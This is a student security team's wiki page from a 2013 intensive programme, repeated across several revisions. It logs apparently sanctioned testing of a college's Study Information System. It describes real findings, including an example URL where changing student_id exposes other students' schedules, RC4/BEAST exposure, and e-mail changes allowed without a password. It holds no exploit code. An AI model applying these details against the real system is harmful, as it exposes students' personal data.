* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''
* Discussion about today's plans.
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).
* Every member wrote a feedback to Wiki page
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)
* IP summarisation.
* Farewell party at St. Patrick's.

'''Problems what we faced:'''

'''Things what we plan to do:'''
* Farewell party, sleep well and start trip to home! :)

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

* '''Final presentation of the project to the clients (4 April 2013)'''
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] ''(Made by whole team, structure by Sandra and Jurij)''
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] ''(Team Security starts from 18:30)''

* '''Final documentation'''
** Can be found in Google Drive (link will be here soon).

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
* '''What I did:'''
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).

* '''What I learned:'''
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.
** I learned how big value "same day feedback and summarisation" has.
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
* '''What I did:'''
** Helped teaching Apache & Linux & DVWA to other participants (due to having some experience already from before).
** Helping with sumorobot programming (Being from the robotics club).
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.

* ''' What I learned:'''
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).

====Sandra Suviste====
* '''What I did:'''
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).
** Practised attacks on the DVWA.
** Went through the OWASP ASVS document for possible shortcomings of the SIS.
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.
** Documented my own and others' work.
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]).

* '''What I learned:'''
** A lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures.
** Became more experienced in working in a multinational group with English as the working language.
** I learned how to document my work in order to keep track of the work of the team.
** I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).
** Different attacks on SIS, changing user ids, SQL injection and XSS.
** Tried to upload a picture (for a lecturer) infected with malicious .php code.
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.
** We made the presentation structure together.
** Googeled a lot :)

* '''What I learned:'''
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.
** Basic attack methods in DVWA: SQL injection, XSS and CSRF.
** What is SIS and how does it works?
** I also learned to program sumorobots, more about Linux and Wireshark.
** And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
* '''What I did:'''
** Tried to find out possible security holes from OIS site.
** Tested different attacking methods with DVWA
** SQL-injection tests into various places on OIS site.
** Tested some XSS methods
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).
** Prepared our presentation with other group members
** Spoke in daily summary
** Studied a lot of information to know what is hacking about?

* '''What i learned:'''
** I learned how to use SQL-injection, XSS, Brute force, CSRF
** I learned also how to use Kali,Backtrack,Temper data, DVWA
** Working in international group
** How important documentation is
** Found out how important it is to make web-application secure

====Mika Salmela====
* '''What I did:'''
** I studied hacking methods
** Tried some hacking methods with DVWA
** Iscanned website, try to find if there is some security risks
** Tried some SQL and XSS injections
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).

* '''What I learned:'''
** More than basics of how to hack?
** The most common hacking methods and how to use them.
** How to do SQL and XSS injections
** Basics of hacking tools
** How to find security risks
** How to work in international team.
** Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).
** Searched for security holes in OIS student information site.
** Used DVWA tool to test sql injections and xss scripting.
** Tried some sql injections and xss scripting on OIS page
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
** Prepared some slides for the main presentation

* '''What have I learned:'''
** Theory about OWASP TOP 10 threats
** How to do sql injections
** How to use Firefox tamperdata tool
** How to do cross-site scripting
** Completely understood what is use case and how to draw them
** How to monitor activities with Wireshark
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
* '''What I did:'''
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])
** I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])
** XSS and injection attacks to SIS

* '''What have I learned:'''
** I have learned about security breaches on the web.
** I have tried different parts of web for vulnerabilities and injection.
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).

===Final documentation===
Our final documentation can be found from Google Drive.
[https://docs.google.com/document/d/1ACCHfErxIn1U__bfTr1TTRNRRLJM9F2rZZ9dttgjed8/edit|Final Documentation]

'''NB! This can be updated in a few hours or so?'''

==IP Feedback==
===Feedback from Sten Aus===
* '''What I did like: '''
** I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time.
** Multicultural groups, where all the participants are from different countries.
** I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.
** I enjoyed out-of-schedule activities. For example, I liked visiting Skype, TV tower and Seaplane Harbour. I have been to TV tower before, but still it was very enjoyable experience. Also, I appreciate that Sander organized pool and bowling. Despite the fact I could not participate in pool, I was in bowling "competition" and it was fun!

* '''What I did not like: ''
** I did not like that we had to sit so much in lectures. :) (Wanted to stretch some more)
** From time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don't know the purpose yet, but you will find it out in the future.

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===
* '''What I did like:'''
** Working in a team on a real-life problem.
** Practising problem-solving and working as a team.
** Learned a lot of new stuff.
** Organisation - well done
** Had a wonderful team!

* '''What I did not like:'''
** A couple of days short of time - as usual...

===Feedback from Markus Rintamäki===
* '''What I did like:'''
** Everything was organized really well.
** I liked the arranged events like sauna, visiting Skype and Tallinn teletorn.
** Everything was also free for us except the beer.
** I met many new interesting people and got to know about their cultures.
** I got new friends for life.
** Our project was interesting and i learned new skills.
** I also liked FREE water, Estonian girls and Americana pizza place.
** This IP was one of my best experiences ever.

* '''What I did not like:'''
** Lack of free time

===Feedback from Tomas Lepistö===
* '''What I did like:'''
** It was nice to meet new people and get new friends from different cultures.
** Also all the events that was arranged were very funny, specially sauna-event!
** Visiting Skype office was something that you don’t get to do everyday!
** Free food!
** Everything was well organized and teachers were truly interested about this intensive course!

* '''What I did not like:'''
** Too long studying/working days.

===Feedback from Mika Salmela===
* '''What I did like:'''
** First of all, i would like thank you everyone!
** Everything was organized well. It was nice to meet new people from other countries. Also all events were excellent!

* '''What I did not like:'''
** Not so much free time T.T

===Feedback from Kęstutis Tautvydas===
* '''What I did like:'''
** Accommodation
** The equipment we used
** The capabilities and expertise of the professors
** The overall quality of teaching
** The expected learning outcomes
** The activities besides the general course
** Friendly environment
** Working in teams. Thanks guys!
** Free water
** Tasty food

* '''What I did not like:'''
** To long working hours

===Feedback from Jurij Lukjančikov===
* '''What I did like:'''
** Working in teams.
** Meeting new people.
** Seeing new places.
** Learning new things.

* '''What I did not like:'''
** Too long studying/working days.
** Brainstorming after whole day of lectures.

Security

2013-04-05T08:44:24Z

Saus: /* Feedback from Markus Rintamäki */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''
* Discussion about today's plans.
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).
* Every member wrote a feedback to Wiki page
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)
* IP summarisation.
* Farewell party at St. Patrick's.

'''Problems what we faced:'''

'''Things what we plan to do:'''
* Farewell party, sleep well and start trip to home! :)

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

* '''Final presentation of the project to the clients (4 April 2013)'''
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] ''(Made by whole team, structure by Sandra and Jurij)''
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] ''(Team Security starts from 18:30)''

* '''Final documentation'''
** Can be found in Google Drive (link will be here soon).

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
* '''What I did:'''
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).

* '''What I learned:'''
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.
** I learned how big value "same day feedback and summarisation" has.
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
* '''What I did:'''
** Helped teaching Apache & Linux & DVWA to other participants (due to having some experience already from before).
** Helping with sumorobot programming (Being from the robotics club).
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.

* ''' What I learned:'''
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).

====Sandra Suviste====
* '''What I did:'''
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).
** Practised attacks on the DVWA.
** Went through the OWASP ASVS document for possible shortcomings of the SIS.
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.
** Documented my own and others' work.
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]).

* '''What I learned:'''
** A lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures.
** Became more experienced in working in a multinational group with English as the working language.
** I learned how to document my work in order to keep track of the work of the team.
** I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).
** Different attacks on SIS, changing user ids, SQL injection and XSS.
** Tried to upload a picture (for a lecturer) infected with malicious .php code.
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.
** We made the presentation structure together.
** Googeled a lot :)

* '''What I learned:'''
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.
** Basic attack methods in DVWA: SQL injection, XSS and CSRF.
** What is SIS and how does it works?
** I also learned to program sumorobots, more about Linux and Wireshark.
** And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
* '''What I did:'''
** Tried to find out possible security holes from OIS site.
** Tested different attacking methods with DVWA
** SQL-injection tests into various places on OIS site.
** Tested some XSS methods
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).
** Prepared our presentation with other group members
** Spoke in daily summary
** Studied a lot of information to know what is hacking about?

* '''What i learned:'''
** I learned how to use SQL-injection, XSS, Brute force, CSRF
** I learned also how to use Kali,Backtrack,Temper data, DVWA
** Working in international group
** How important documentation is
** Found out how important it is to make web-application secure

====Mika Salmela====
* '''What I did:'''
** I studied hacking methods
** Tried some hacking methods with DVWA
** Iscanned website, try to find if there is some security risks
** Tried some SQL and XSS injections
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).

* '''What I learned:'''
** More than basics of how to hack?
** The most common hacking methods and how to use them.
** How to do SQL and XSS injections
** Basics of hacking tools
** How to find security risks
** How to work in international team.
** Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).
** Searched for security holes in OIS student information site.
** Used DVWA tool to test sql injections and xss scripting.
** Tried some sql injections and xss scripting on OIS page
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
** Prepared some slides for the main presentation

* '''What have I learned:'''
** Theory about OWASP TOP 10 threats
** How to do sql injections
** How to use Firefox tamperdata tool
** How to do cross-site scripting
** Completely understood what is use case and how to draw them
** How to monitor activities with Wireshark
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
* '''What I did:'''
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])
** I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])
** XSS and injection attacks to SIS

* '''What have I learned:'''
** I have learned about security breaches on the web.
** I have tried different parts of web for vulnerabilities and injection.
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).

===Final documentation===
====Analysis====

====Solution====

==IP Feedback==
===Feedback from Sten Aus===
* '''What I did like: '''
** I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time.
** Multicultural groups, where all the participants are from different countries.
** I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.
** I enjoyed out-of-schedule activities. For example, I liked visiting Skype, TV tower and Seaplane Harbour. I have been to TV tower before, but still it was very enjoyable experience. Also, I appreciate that Sander organized pool and bowling. Despite the fact I could not participate in pool, I was in bowling "competition" and it was fun!

* '''What I did not like: ''
** I did not like that we had to sit so much in lectures. :) (Wanted to stretch some more)
** From time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don't know the purpose yet, but you will find it out in the future.

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===
* '''What I did like:'''
** Working in a team on a real-life problem.
** Practising problem-solving and working as a team.
** Learned a lot of new stuff.
** Organisation - well done
** Had a wonderful team!

* '''What I did not like:'''
** A couple of days short of time - as usual...

===Feedback from Markus Rintamäki===
* '''What I did like:'''
** Everything was organized really well.
** I liked the arranged events like sauna, visiting Skype and Tallinn teletorn.
** Everything was also free for us except the beer.
** I met many new interesting people and got to know about their cultures.
** I got new friends for life.
** Our project was interesting and i learned new skills.
** I also liked FREE water, Estonian girls and Americana pizza place.
** This IP was one of my best experiences ever.

* '''What I did not like:'''
** Lack of free time

===Feedback from Tomas Lepistö===
* '''What I did like:'''
** It was nice to meet new people and get new friends from different cultures.
** Also all the events that was arranged were very funny, specially sauna-event!
** Visiting Skype office was something that you don’t get to do everyday!
** Free food!
** Everything was well organized and teachers were truly interested about this intensive course!

* '''What I did not like:'''
** Too long studying/working days.

===Feedback from Mika Salmela===
* '''What I did like:'''
** First of all, i would like thank you everyone!
** Everything was organized well. It was nice to meet new people from other countries. Also all events were excellent!

* '''What I did not like:'''
** Not so much free time T.T

===Feedback from Kęstutis Tautvydas===
* '''What I did like:'''
** Accommodation
** The equipment we used
** The capabilities and expertise of the professors
** The overall quality of teaching
** The expected learning outcomes
** The activities besides the general course
** Friendly environment
** Working in teams. Thanks guys!
** Free water
** Tasty food

* '''What I did not like:'''
** To long working hours

===Feedback from Jurij Lukjančikov===
* '''What I did like:'''
** Working in teams.
** Meeting new people.
** Seeing new places.
** Learning new things.

* '''What I did not like:'''
** Too long studying/working days.
** Brainstorming after whole day of lectures.

Security

2013-04-05T08:43:38Z

Saus: /* Feedback from Sten Aus */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
